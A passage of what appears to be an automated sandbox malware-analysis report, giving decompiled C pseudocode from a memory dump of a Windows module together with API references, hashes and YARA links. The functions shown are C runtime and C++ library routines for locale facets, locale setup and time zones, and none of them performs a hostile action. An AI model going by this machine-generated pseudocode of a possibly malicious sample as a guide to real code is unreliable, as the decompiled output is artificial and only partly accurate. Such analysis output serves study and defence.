																																																				_t751 =  *0x6de96dd0; // 0x0
																																																				 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																																				 *(_t770 - 0x10) = _t751;
																																																				_t459 = E6DDB161C(0x6de96d60);
																																																				_t659 =  *((intOrPtr*)(_t770 + 8));
																																																				_t733 = E6DDB171B( *((intOrPtr*)(_t770 + 8)), _t459);
																																																				__eflags = _t733;
																																																				if(_t733 != 0) {
																																																					L117:
																																																					E6DDD66BA(_t770 - 0x14);
																																																					return E6DDF0075(_t733);
																																																				} else {
																																																					__eflags = _t751;
																																																					if(_t751 == 0) {
																																																						_push( *((intOrPtr*)(_t770 + 8)));
																																																						_push(_t770 - 0x10);
																																																						__eflags = E6DDE162A(_t544, _t659, _t715, _t733, _t751) - 0xffffffff;
																																																						if(__eflags == 0) {
																																																							_t663 = _t770 - 0x20;
																																																							E6DDB1438(_t663);
																																																							E6DDF3D74(_t770 - 0x20, 0x6de93504);
																																																							asm("int3");
																																																							E6DDF00AC(0x6de3851f, _t544, _t733, _t751, 4);
																																																							_t752 = _t663;
																																																							 *(_t770 - 0x10) = _t752;
																																																							 *((intOrPtr*)(_t752 + 4)) =  *((intOrPtr*)(_t770 + 0xc));
																																																							_push( *((intOrPtr*)(_t770 + 0x14)));
																																																							_t245 = _t770 - 4;
																																																							 *_t245 =  *(_t770 - 4) & 0x00000000;
																																																							__eflags =  *_t245;
																																																							 *_t752 = 0x6de3c0c4;
																																																							 *((char*)(_t752 + 0x28)) =  *((intOrPtr*)(_t770 + 0x10));
																																																							E6DDE542F(_t544, _t663, _t715, _t733, _t752,  *_t245);
																																																							return E6DDF0075(_t752,  *((intOrPtr*)(_t770 + 8)));
																																																						} else {
																																																							_t733 =  *(_t770 - 0x10);
																																																							 *(_t770 - 0x10) = _t733;
																																																							 *(_t770 - 4) = 1;
																																																							E6DDD6FD3(__eflags, _t733);
																																																							 *0x6de3a26c();
																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t733 + 4))))();
																																																							 *0x6de96dd0 = _t733;
																																																							goto L117;
																																																						}
																																																					} else {
																																																						_t733 = _t751;
																																																						goto L117;
																																																					}
																																																				}
																																																			} else {
																																																				_t732 =  *(_t770 - 0x10);
																																																				 *(_t770 - 0x10) = _t732;
																																																				 *(_t770 - 4) = 1;
																																																				E6DDD6FD3(__eflags, _t732);
																																																				 *0x6de3a26c();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t732 + 4))))();
																																																				 *0x6de96e00 = _t732;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t732 = _t750;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t731 =  *(_t770 - 0x10);
																																																	 *(_t770 - 0x10) = _t731;
																																																	 *(_t770 - 4) = 1;
																																																	E6DDD6FD3(__eflags, _t731);
																																																	 *0x6de3a26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t731 + 4))))();
																																																	 *0x6de96dcc = _t731;
																																																	goto L103;
																																																}
																																															} else {
																																																_t731 = _t749;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t730 =  *(_t770 - 0x10);
																																														 *(_t770 - 0x10) = _t730;
																																														 *(_t770 - 4) = 1;
																																														E6DDD6FD3(__eflags, _t730);
																																														 *0x6de3a26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t730 + 4))))();
																																														 *0x6de96dfc = _t730;
																																														goto L96;
																																													}
																																												} else {
																																													_t730 = _t748;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t729 =  *(_t770 - 0x10);
																																											 *(_t770 - 0x10) = _t729;
																																											 *(_t770 - 4) = 1;
																																											E6DDD6FD3(__eflags, _t729);
																																											 *0x6de3a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t729 + 4))))();
																																											 *0x6de96de0 = _t729;
																																											goto L89;
																																										}
																																									} else {
																																										_t729 = _t747;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t728 =  *(_t770 - 0x10);
																																								 *(_t770 - 0x10) = _t728;
																																								 *(_t770 - 4) = 1;
																																								E6DDD6FD3(__eflags, _t728);
																																								 *0x6de3a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t728 + 4))))();
																																								 *0x6de96ddc = _t728;
																																								goto L82;
																																							}
																																						} else {
																																							_t728 = _t746;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t727 =  *(_t770 - 0x10);
																																					 *(_t770 - 0x10) = _t727;
																																					 *(_t770 - 4) = 1;
																																					E6DDD6FD3(__eflags, _t727);
																																					 *0x6de3a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t727 + 4))))();
																																					 *0x6de96db0 = _t727;
																																					goto L75;
																																				}
																																			} else {
																																				_t727 = _t745;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t726 =  *(_t770 - 0x10);
																																		 *(_t770 - 0x10) = _t726;
																																		 *(_t770 - 4) = 1;
																																		E6DDD6FD3(__eflags, _t726);
																																		 *0x6de3a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t726 + 4))))();
																																		 *0x6de96dd8 = _t726;
																																		goto L68;
																																	}
																																} else {
																																	_t726 = _t744;
																																	goto L68;
																																}
																															}
																														} else {
																															_t725 =  *(_t770 - 0x10);
																															 *(_t770 - 0x10) = _t725;
																															 *(_t770 - 4) = 1;
																															E6DDD6FD3(__eflags, _t725);
																															 *0x6de3a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t725 + 4))))();
																															 *0x6de96dc4 = _t725;
																															goto L61;
																														}
																													} else {
																														_t725 = _t743;
																														goto L61;
																													}
																												}
																											} else {
																												_t724 =  *(_t770 - 0x10);
																												 *(_t770 - 0x10) = _t724;
																												 *(_t770 - 4) = 1;
																												E6DDD6FD3(__eflags, _t724);
																												 *0x6de3a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t724 + 4))))();
																												 *0x6de96dc8 = _t724;
																												goto L54;
																											}
																										} else {
																											_t724 = _t742;
																											goto L54;
																										}
																									}
																								} else {
																									_t723 =  *(_t770 - 0x10);
																									 *(_t770 - 0x10) = _t723;
																									 *(_t770 - 4) = 1;
																									E6DDD6FD3(__eflags, _t723);
																									 *0x6de3a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t723 + 4))))();
																									 *0x6de96df4 = _t723;
																									goto L47;
																								}
																							} else {
																								_t723 = _t741;
																								goto L47;
																							}
																						}
																					} else {
																						_t722 =  *(_t770 - 0x10);
																						 *(_t770 - 0x10) = _t722;
																						 *(_t770 - 4) = 1;
																						E6DDD6FD3(__eflags, _t722);
																						 *0x6de3a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t722 + 4))))();
																						 *0x6de96df8 = _t722;
																						goto L40;
																					}
																				} else {
																					_t722 = _t740;
																					goto L40;
																				}
																			}
																		} else {
																			_t721 =  *(_t770 - 0x10);
																			 *(_t770 - 0x10) = _t721;
																			 *(_t770 - 4) = 1;
																			E6DDD6FD3(__eflags, _t721);
																			 *0x6de3a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t721 + 4))))();
																			 *0x6de96dc0 = _t721;
																			goto L33;
																		}
																	} else {
																		_t721 = _t739;
																		goto L33;
																	}
																}
															} else {
																_t720 =  *(_t770 - 0x10);
																 *(_t770 - 0x10) = _t720;
																 *(_t770 - 4) = 1;
																E6DDD6FD3(__eflags, _t720);
																 *0x6de3a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t720 + 4))))();
																 *0x6de96df0 = _t720;
																goto L26;
															}
														} else {
															_t720 = _t738;
															goto L26;
														}
													}
												} else {
													_t719 =  *(_t770 - 0x10);
													 *(_t770 - 0x10) = _t719;
													 *(_t770 - 4) = 1;
													E6DDD6FD3(__eflags, _t719);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t719 + 4))))();
													 *0x6de96dbc = _t719;
													goto L19;
												}
											} else {
												_t719 = _t737;
												goto L19;
											}
										}
									} else {
										_t718 =  *(_t770 - 0x10);
										 *(_t770 - 0x10) = _t718;
										 *(_t770 - 4) = 1;
										E6DDD6FD3(__eflags, _t718);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t718 + 4))))();
										 *0x6de96dec = _t718;
										goto L12;
									}
								} else {
									_t718 = _t736;
									goto L12;
								}
							}
						} else {
							_t717 =  *(_t770 - 0x10);
							 *(_t770 - 0x10) = _t717;
							 *(_t770 - 4) = 1;
							E6DDD6FD3(__eflags, _t717);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t717 + 4))))();
							 *0x6de96db8 = _t717;
							goto L5;
						}
					} else {
						_t717 = _t735;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6DDDF230
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDF23A
int.LIBCPMT ref: 6DDDF251

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

messages.LIBCPMT ref: 6DDDF274
std::_Facet_Register.LIBCPMT ref: 6DDDF28B
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDF2AB
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDF2C9

Strings

lmm, xrefs: 6DDDF245

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmessages
String ID: lmm
API String ID: 438560357-2367748141
Opcode ID: 0d467e6add125988b5e45caa002f3ffea003f5d5c493ebb3c8edee23b1f6205b
Instruction ID: 58f20b1c89b14730b489fc61ca31d58e4a320212ec0119508bb2695bfa7fb71c
Opcode Fuzzy Hash: 0d467e6add125988b5e45caa002f3ffea003f5d5c493ebb3c8edee23b1f6205b
Instruction Fuzzy Hash: B111C276808119DBCF01FBA4C840AFDB774AF84718F264109F621AB294DF749A05CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DE1E984, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 274
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E6DE1E984(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				short _v270;
				short _v272;
				char _v528;
				char _v700;
				signed int _v704;
				signed int _v708;
				short _v710;
				signed int* _v712;
				signed int _v716;
				signed int _v720;
				signed int _v724;
				signed int* _v728;
				signed int _v732;
				signed int _v736;
				signed int _v740;
				signed int _v744;
				signed int _t151;
				void* _t158;
				signed int _t159;
				signed int _t160;
				intOrPtr _t161;
				signed int _t164;
				signed int _t168;
				signed int _t169;
				intOrPtr* _t171;
				intOrPtr _t172;
				signed int _t175;
				signed int _t176;
				signed int _t178;
				signed int _t198;
				signed int _t199;
				signed int _t202;
				signed int _t207;
				signed int _t210;
				signed int _t216;
				intOrPtr* _t217;
				signed int _t230;
				signed int _t233;
				intOrPtr* _t234;
				signed int _t236;
				signed int* _t240;
				intOrPtr _t249;
				signed int _t254;
				signed int _t256;
				void* _t257;
				signed int _t260;
				signed int* _t261;
				intOrPtr* _t262;
				short _t263;
				signed int _t265;
				signed int _t267;
				void* _t269;
				void* _t271;

				_t265 = _t267;
				_t151 =  *0x6de9506c; // 0x657f4f7b
				_v8 = _t151 ^ _t265;
				_push(__ebx);
				_t210 = _a8;
				_push(__esi);
				_push(__edi);
				_t249 = _a4;
				_v744 = _t210;
				_v728 = E6DE1D5FF(_t210, __ecx, __edx) + 0x278;
				_t158 = E6DE1DE92(_t210, __edx, _t249, _a12, _a12,  &_v272, 0x83,  &_v700, 0x55,  &_v708);
				_t269 = _t267 - 0x2e4 + 0x18;
				if(_t158 != 0) {
					_t11 = _t210 + 2; // 0x6
					_t254 = _t11 << 4;
					__eflags = _t254;
					_t159 =  &_v272;
					_v716 = _t254;
					_t247 =  *(_t254 + _t249);
					_t216 =  *(_t254 + _t249);
					while(1) {
						_v704 = _v704 & 0x00000000;
						__eflags =  *_t159 -  *_t216;
						_t256 = _v716;
						if( *_t159 !=  *_t216) {
							break;
						}
						__eflags =  *_t159;
						if( *_t159 == 0) {
							L9:
							_t160 = _v704;
						} else {
							_t263 =  *((intOrPtr*)(_t159 + 2));
							__eflags = _t263 -  *((intOrPtr*)(_t216 + 2));
							_v710 = _t263;
							_t256 = _v716;
							if(_t263 !=  *((intOrPtr*)(_t216 + 2))) {
								break;
							} else {
								_t159 = _t159 + 4;
								_t216 = _t216 + 4;
								__eflags = _v710;
								if(_v710 != 0) {
									continue;
								} else {
									goto L9;
								}
							}
						}
						L11:
						__eflags = _t160;
						if(_t160 != 0) {
							_t217 =  &_v272;
							_t247 = _t217 + 2;
							do {
								_t161 =  *_t217;
								_t217 = _t217 + 2;
								__eflags = _t161 - _v704;
							} while (_t161 != _v704);
							_v720 = (_t217 - _t247 >> 1) + 1;
							_t164 = E6DE1F26D(_t217 - _t247 >> 1, 4 + ((_t217 - _t247 >> 1) + 1) * 2);
							_v732 = _t164;
							__eflags = _t164;
							if(_t164 == 0) {
								goto L2;
							} else {
								_v724 =  *((intOrPtr*)(_t256 + _t249));
								_t35 = _t210 * 4; // 0xe764e850
								_v736 =  *((intOrPtr*)(_t249 + _t35 + 0xa0));
								_t38 = _t249 + 8; // 0x8b018b
								_v740 =  *_t38;
								_t226 =  &_v272;
								_v712 = _t164 + 4;
								_t168 = E6DE191A7(_t164 + 4, _v720,  &_v272);
								_t271 = _t269 + 0xc;
								__eflags = _t168;
								if(_t168 != 0) {
									_t169 = _v704;
									_push(_t169);
									_push(_t169);
									_push(_t169);
									_push(_t169);
									_push(_t169);
									E6DE12188();
									asm("int3");
									_t171 =  *0x6de976f0; // 0xba1de0
									 *0x6de95108 =  *((intOrPtr*)(_t171 + 0x88));
									 *0x6de951c0 =  *_t171;
									_t172 =  *((intOrPtr*)(_t171 + 4));
									 *0x6de951ec = _t172;
									return _t172;
								} else {
									__eflags = _v272 - 0x43;
									 *((intOrPtr*)(_t256 + _t249)) = _v712;
									if(_v272 != 0x43) {
										L20:
										_t175 = E6DE1DB3B(_t210, _t226, _t249,  &_v700);
										_t230 = _v704;
										 *(_t249 + 0xa0 + _t210 * 4) = _t175;
									} else {
										__eflags = _v270;
										if(_v270 != 0) {
											goto L20;
										} else {
											_t230 = _v704;
											 *(_t249 + 0xa0 + _t210 * 4) = _t230;
										}
									}
									__eflags = _t210 - 2;
									if(_t210 != 2) {
										__eflags = _t210 - 1;
										if(_t210 != 1) {
											__eflags = _t210 - 5;
											if(_t210 == 5) {
												 *((intOrPtr*)(_t249 + 0x14)) = _v708;
											}
										} else {
											 *((intOrPtr*)(_t249 + 0x10)) = _v708;
										}
									} else {
										_t261 = _v728;
										_t247 = _t230;
										_t240 = _t261;
										 *(_t249 + 8) = _v708;
										_v712 = _t261;
										_v720 = _t261[8];
										_v708 = _t261[9];
										while(1) {
											_t64 = _t249 + 8; // 0x8b018b
											__eflags =  *_t64 -  *_t240;
											if( *_t64 ==  *_t240) {
												break;
											}
											_t262 = _v712;
											_t247 = _t247 + 1;
											_t207 =  *_t240;
											 *_t262 = _v720;
											_v708 = _t240[1];
											_t240 = _t262 + 8;
											 *((intOrPtr*)(_t262 + 4)) = _v708;
											_t210 = _v744;
											_t261 = _v728;
											_v720 = _t207;
											_v712 = _t240;
											__eflags = _t247 - 5;
											if(_t247 < 5) {
												continue;
											} else {
											}
											L28:
											__eflags = _t247 - 5;
											if(__eflags == 0) {
												_t88 = _t249 + 8; // 0x8b018b
												_t198 = E6DE26102(_t210, _t247, _t249, __eflags, _v704, 1, 0x6de40ea8, 0x7f,  &_v528,  *_t88, 1);
												_t271 = _t271 + 0x1c;
												__eflags = _t198;
												_t199 = _v704;
												if(_t198 == 0) {
													_t261[1] = _t199;
												} else {
													do {
														 *(_t265 + _t199 * 2 - 0x20c) =  *(_t265 + _t199 * 2 - 0x20c) & 0x000001ff;
														_t199 = _t199 + 1;
														__eflags = _t199 - 0x7f;
													} while (_t199 < 0x7f);
													_t202 = E6DDF1C3C( &_v528,  *0x6de951e8, 0xfe);
													_t271 = _t271 + 0xc;
													__eflags = _t202;
													_t261[1] = 0 | _t202 == 0x00000000;
												}
												_t103 = _t249 + 8; // 0x8b018b
												 *_t261 =  *_t103;
											}
											 *(_t249 + 0x18) = _t261[1];
											goto L39;
										}
										__eflags = _t247;
										if(_t247 != 0) {
											 *_t261 =  *(_t261 + _t247 * 8);
											_t261[1] =  *(_t261 + 4 + _t247 * 8);
											 *(_t261 + _t247 * 8) = _v720;
											 *(_t261 + 4 + _t247 * 8) = _v708;
										}
										goto L28;
									}
									L39:
									_t176 = _t210 * 0xc;
									_t110 = _t176 + 0x6de40de8; // 0x6ddd815c
									 *0x6de3a26c(_t249);
									_t178 =  *((intOrPtr*)( *_t110))();
									_t233 = _v724;
									__eflags = _t178;
									if(_t178 == 0) {
										__eflags = _t233 - 0x6de952b0;
										if(_t233 != 0x6de952b0) {
											_t260 = _t210 + _t210;
											__eflags = _t260;
											asm("lock xadd [eax], ecx");
											if(_t260 != 0) {
												goto L44;
											} else {
												_t128 = _t260 * 8; // 0x10468b00
												E6DE1CBD3( *((intOrPtr*)(_t249 + _t128 + 0x28)));
												_t131 = _t260 * 8; // 0x3b8e8
												E6DE1CBD3( *((intOrPtr*)(_t249 + _t131 + 0x24)));
												_t134 = _t210 * 4; // 0xe764e850
												E6DE1CBD3( *((intOrPtr*)(_t249 + _t134 + 0xa0)));
												_t236 = _v704;
												 *((intOrPtr*)(_v716 + _t249)) = _t236;
												 *(_t249 + 0xa0 + _t210 * 4) = _t236;
											}
										}
										_t234 = _v732;
										 *_t234 = 1;
										 *((intOrPtr*)(_t249 + 0x28 + (_t210 + _t210) * 8)) = _t234;
									} else {
										 *(_v716 + _t249) = _t233;
										_t115 = _t210 * 4; // 0xe764e850
										E6DE1CBD3( *((intOrPtr*)(_t249 + _t115 + 0xa0)));
										 *(_t249 + 0xa0 + _t210 * 4) = _v736;
										E6DE1CBD3(_v732);
										 *(_t249 + 8) = _v740;
										goto L2;
									}
									goto L3;
								}
							}
						} else {
							goto L3;
						}
						goto L47;
					}
					asm("sbb eax, eax");
					_t160 = _t159 | 0x00000001;
					__eflags = _t160;
					goto L11;
				} else {
					L2:
					L3:
					_pop(_t257);
					return E6DDEF8A5(_v8 ^ _t265, _t247, _t257);
				}
				L47:
			}

APIs

Part of subcall function 6DE1D5FF: GetLastError.KERNEL32(?,6DEACE94,6DE11803,6DE92B60,0000000C,6DDD402A,00000000,00000001,?,`km,00000020,6DDD159B,4B767D5A), ref: 6DE1D603
Part of subcall function 6DE1D5FF: _free.LIBCMT ref: 6DE1D636
Part of subcall function 6DE1D5FF: SetLastError.KERNEL32(00000000,6DE92B60,0000000C,6DDD402A,00000000,00000001,?,`km,00000020,6DDD159B,4B767D5A), ref: 6DE1D677
Part of subcall function 6DE1D5FF: _abort.LIBCMT ref: 6DE1D67D

_memcmp.LIBVCRUNTIME ref: 6DE1EC2E
_free.LIBCMT ref: 6DE1EC9F
_free.LIBCMT ref: 6DE1ECB8
_free.LIBCMT ref: 6DE1ECEA
_free.LIBCMT ref: 6DE1ECF3
_free.LIBCMT ref: 6DE1ECFF

Strings

C, xrefs: 6DE1EAEC

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C
API String ID: 1679612858-1037565863
Opcode ID: 94333c34b96375603501a6de671234311788dfd0603704c3e849d7c2730d6203
Instruction ID: 769884c0d9fd666be619ceee04bcc338422615160f43162fe9bd706723e733ea
Opcode Fuzzy Hash: 94333c34b96375603501a6de671234311788dfd0603704c3e849d7c2730d6203
Instruction Fuzzy Hash: 6FC11D75A0961A9FDB24CF18CC84AADB7B4FF49708F2085AAE549E7750DB31AD90CF40

Uniqueness

Uniqueness Score: -1.00%

Function 6DE28951, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 171
timeCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E6DE28951(void* __ebx, void* __edi, void* __eflags) {
				int _v8;
				int _v12;
				int _v16;
				int _v20;
				signed int _v56;
				char _v268;
				intOrPtr _v272;
				char _v276;
				char _v312;
				char _v316;
				void* __esi;
				void* __ebp;
				void* _t36;
				signed int _t38;
				signed int _t42;
				signed int _t50;
				void* _t54;
				void* _t56;
				signed int* _t61;
				intOrPtr _t71;
				void* _t78;
				signed int _t85;
				void* _t87;
				signed int _t88;
				signed int _t90;
				int _t94;
				char** _t96;
				signed int _t100;
				signed int _t101;
				signed int _t106;
				signed int _t107;
				intOrPtr _t116;
				intOrPtr _t118;

				_t89 = __edi;
				_t96 = E6DE2822B();
				_t1 =  &_v8; // 0x6de42130
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_t36 = E6DE28289(_t1);
				_pop(_t78);
				if(_t36 != 0) {
					L19:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E6DE12188();
					asm("int3");
					_t106 = _t107;
					_t38 =  *0x6de9506c; // 0x657f4f7b
					_v56 = _t38 ^ _t106;
					 *0x6de95384 =  *0x6de95384 | 0xffffffff;
					 *0x6de95378 =  *0x6de95378 | 0xffffffff;
					_push(0);
					_push(_t96);
					_t90 = 0;
					 *0x6de97a10 = 0;
					_t42 = E6DE21216(0x6de42130, _t87, 0, __eflags,  &_v316,  &_v312, 0x100, 0x6de42130);
					__eflags = _t42;
					if(_t42 != 0) {
						__eflags = _t42 - 0x22;
						if(_t42 == 0x22) {
							_t101 = E6DE1F26D(_t78, _v272);
							__eflags = _t101;
							if(__eflags != 0) {
								_t50 = E6DE21216(0x6de42130, _t87, 0, __eflags,  &_v276, _t101, _v272, 0x6de42130);
								__eflags = _t50;
								if(_t50 == 0) {
									E6DE1CBD3(0);
									_t90 = _t101;
								} else {
									_push(_t101);
									goto L26;
								}
							} else {
								_push(0);
								L26:
								E6DE1CBD3();
							}
						}
					} else {
						_t90 =  &_v268;
					}
					asm("sbb esi, esi");
					_t100 =  ~(_t90 -  &_v268) & _t90;
					__eflags = _t90;
					if(__eflags == 0) {
						L34:
						E6DE28951(0x6de42130, _t90, __eflags);
					} else {
						__eflags =  *_t90;
						if(__eflags == 0) {
							goto L34;
						} else {
							_push(_t90);
							E6DE2877C(0x6de42130, _t90, __eflags);
						}
					}
					E6DE1CBD3(_t100);
					__eflags = _v12 ^ _t106;
					return E6DDEF8A5(_v12 ^ _t106, _t87, _t100);
				} else {
					_t54 = E6DE28231( &_v12);
					_pop(_t78);
					if(_t54 != 0) {
						goto L19;
					} else {
						_t56 = E6DE2825D( &_v16);
						_pop(_t78);
						if(_t56 != 0) {
							goto L19;
						} else {
							E6DE1CBD3( *0x6de97a08);
							 *0x6de97a08 = 0;
							 *_t107 = 0x6de97a18;
							if(GetTimeZoneInformation(??) != 0xffffffff) {
								_t85 =  *0x6de97a18 * 0x3c;
								_t88 =  *0x6de97a6c; // 0x0
								_push(__edi);
								 *0x6de97a10 = 1;
								_v8 = _t85;
								_t116 =  *0x6de97a5e; // 0x0
								if(_t116 != 0) {
									_v8 = _t85 + _t88 * 0x3c;
								}
								_t118 =  *0x6de97ab2; // 0x0
								if(_t118 == 0) {
									L9:
									_v12 = 0;
									_v16 = 0;
								} else {
									_t71 =  *0x6de97ac0; // 0x0
									if(_t71 == 0) {
										goto L9;
									} else {
										_v12 = 1;
										_v16 = (_t71 - _t88) * 0x3c;
									}
								}
								_t94 = E6DE13CD0(0, _t88);
								if(WideCharToMultiByte(_t94, 0, 0x6de97a1c, 0xffffffff,  *_t96, 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
									 *( *_t96) = 0;
								} else {
									( *_t96)[0x3f] = 0;
								}
								if(WideCharToMultiByte(_t94, 0, 0x6de97a70, 0xffffffff, _t96[1], 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
									 *(_t96[1]) = 0;
								} else {
									_t96[1][0x3f] = 0;
								}
							}
							 *(E6DE28225()) = _v8;
							 *(E6DE28219()) = _v12;
							_t61 = E6DE2821F();
							 *_t61 = _v16;
							return _t61;
						}
					}
				}
			}

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6DE42130), ref: 6DE289BB
WideCharToMultiByte.KERNEL32(00000000,00000000,6DE97A1C,000000FF,00000000,0000003F,00000000,?,?), ref: 6DE28A33
WideCharToMultiByte.KERNEL32(00000000,00000000,6DE97A70,000000FF,?,0000003F,00000000,?), ref: 6DE28A60
_free.LIBCMT ref: 6DE289A9

Part of subcall function 6DE1CBD3: HeapFree.KERNEL32(00000000,00000000,?,6DE2CFAF,00000000,00000000,00000000,00000000,?,6DE2D2B4,00000000,00000007,00000000,?,6DE2C0FC,00000000), ref: 6DE1CBE9
Part of subcall function 6DE1CBD3: GetLastError.KERNEL32(00000000,?,6DE2CFAF,00000000,00000000,00000000,00000000,?,6DE2D2B4,00000000,00000007,00000000,?,6DE2C0FC,00000000,00000000), ref: 6DE1CBFB

_free.LIBCMT ref: 6DE28B75

Strings

0!m, xrefs: 6DE28964, 6DE2896A
0!m, xrefs: 6DE28AD8

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID: 0!m$0!m
API String ID: 1286116820-1395855498
Opcode ID: 83393200c7e2b17309fb69254005481ce6415da97b2b8e57cb5ec7cd730e1b94
Instruction ID: e68977eb1193c54e642464f88e366187d46331ea82504d62cf11590a73edc188
Opcode Fuzzy Hash: 83393200c7e2b17309fb69254005481ce6415da97b2b8e57cb5ec7cd730e1b94
Instruction Fuzzy Hash: F851C9B2D05619EFDB10DF698CC09BEB7B8EB41318B31466ED554A7240EF709A458BA0

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDFC89, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E6DDDFC89(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t55;
				intOrPtr* _t63;
				intOrPtr* _t64;
				void* _t66;

				_t48 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t66 - 0x14, 0);
				_t63 =  *0x6de96dd0; // 0x0
				 *(_t66 - 4) =  *(_t66 - 4) & 0x00000000;
				 *((intOrPtr*)(_t66 - 0x10)) = _t63;
				_t27 = E6DDB161C(0x6de96d60);
				_t51 =  *((intOrPtr*)(_t66 + 8));
				_t28 = E6DDB171B( *((intOrPtr*)(_t66 + 8)), _t27);
				_t61 = _t28;
				if(_t28 != 0) {
					L5:
					E6DDD66BA(_t66 - 0x14);
					return E6DDF0075(_t61);
				} else {
					if(_t63 == 0) {
						_push( *((intOrPtr*)(_t66 + 8)));
						_push(_t66 - 0x10);
						__eflags = E6DDE162A(__ebx, _t51, __edx, _t61, _t63) - 0xffffffff;
						if(__eflags == 0) {
							_t55 = _t66 - 0x20;
							E6DDB1438(_t55);
							E6DDF3D74(_t66 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de3851f, __ebx, _t61, _t63, 4);
							_t64 = _t55;
							 *((intOrPtr*)(_t66 - 0x10)) = _t64;
							 *((intOrPtr*)(_t64 + 4)) =  *((intOrPtr*)(_t66 + 0xc));
							_push( *((intOrPtr*)(_t66 + 0x14)));
							_t21 = _t66 - 4;
							 *_t21 =  *(_t66 - 4) & 0x00000000;
							__eflags =  *_t21;
							 *_t64 = 0x6de3c0c4;
							 *((char*)(_t64 + 0x28)) =  *((intOrPtr*)(_t66 + 0x10));
							E6DDE542F(_t48, _t55, __edx, _t61, _t64,  *_t21);
							return E6DDF0075(_t64,  *((intOrPtr*)(_t66 + 8)));
						} else {
							_t61 =  *((intOrPtr*)(_t66 - 0x10));
							 *((intOrPtr*)(_t66 - 0x10)) = _t61;
							 *(_t66 - 4) = 1;
							E6DDD6FD3(__eflags, _t61);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t61 + 4))))();
